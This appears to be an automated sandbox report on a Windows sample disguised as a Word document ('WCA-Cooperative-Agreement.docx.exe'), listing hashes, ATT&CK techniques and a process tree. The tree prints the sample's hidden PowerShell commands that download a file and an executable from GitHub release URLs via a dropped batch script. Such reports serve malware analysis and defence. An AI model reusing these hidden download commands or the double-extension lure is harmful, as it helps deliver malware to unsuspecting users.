123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072

General

Target

WCA-Cooperative-Agreement.docx.exe
Size

97KB
MD5

190d6b741716c51f9ab8b3601b5fb284
SHA1

77a6597f81c84555eec881f69a7f54e48503ba9c
SHA256

123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072
SHA512

e15a52f9f4597671a63e46f2b23130210d401c5a6b45bc9d024770e2348367109c128b60f24bb8bac259acf89258afed11ac3e26ed8453acb00fa57644c3e270
SSDEEP

1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfOxTDzfhPGT+/CBOg:Hq6+ouCpk2mpcWJ0r+QNTBfO9flu6CF

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2216	powershell.exe
3052	powershell.exe
3052	powershell.exe
2216	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WCA-Cooperative-Agreement.docx.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3052	powershell.exe
2216	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 976	2148	WCA-Cooperative-Agreement.docx.exe	31
PID 2148 wrote to memory of 976	2148	WCA-Cooperative-Agreement.docx.exe	31
PID 2148 wrote to memory of 976	2148	WCA-Cooperative-Agreement.docx.exe	31
PID 2148 wrote to memory of 976	2148	WCA-Cooperative-Agreement.docx.exe	31
PID 976 wrote to memory of 3052	976	cmd.exe	33
PID 976 wrote to memory of 3052	976	cmd.exe	33
PID 976 wrote to memory of 3052	976	cmd.exe	33
PID 976 wrote to memory of 2216	976	cmd.exe	34
PID 976 wrote to memory of 2216	976	cmd.exe	34
PID 976 wrote to memory of 2216	976	cmd.exe	34
PID 976 wrote to memory of 2772	976	cmd.exe	35
PID 976 wrote to memory of 2772	976	cmd.exe	35
PID 976 wrote to memory of 2772	976	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\WCA-Cooperative-Agreement.docx.exe
"C:\Users\Admin\AppData\Local\Temp\WCA-Cooperative-Agreement.docx.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CF21.tmp\CF22.tmp\CF23.bat C:\Users\Admin\AppData\Local\Temp\WCA-Cooperative-Agreement.docx.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/agreement/releases/download/ag/agreement0003.jpg/' -outfile agreement0003.jpg"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/secured00walti/releases/download/tg-igwe/task1hm.exe/' -outfile task1hm.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- - C:\Windows\system32\calc.exe
    calc.exe
    3⤵
    PID:2772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CF21.tmp\CF22.tmp\CF23.bat

Filesize
2KB

MD5
29e689c445bd3cef5af9e1fff429d38b

SHA1
3042260fccd1160df610889eff836668c7c4fbb3

SHA256
cdf5084da6344bb254cf8bd7a22991f7dae43eafff8b1a23315add3fb65c5278

SHA512
a56c70d0926ddbd84f2942237acf361f5a77254d36a7dc3e38dc60fa6807f4cf987a505bcc1c21d5bea1be0c03d9023008025ec4ce6ea466dd7fd20c950f9e09

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3d66c750e165ec6f269b03294fe76d7a

SHA1
1a8fae51e3018cbc4e616e52e84aa35097f83115

SHA256
673a4b894f55a101d1cd56ccae78f0d2685e68bccea0efa5756b75262adf77bf

SHA512
32030fc930a13c946ea04e1b48b0bfa222176beb5b7ab9fde3dc0e5006cb38277d7935eaf8fd2ef83218ae178ca00caac1b5779f68341e1bae4fa69ed9248605

Download Submit
memory/2216-18-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2216-19-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/3052-6-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

Filesize
4KB

Download
memory/3052-7-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/3052-8-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download
memory/3052-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/3052-10-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/3052-11-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/3052-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing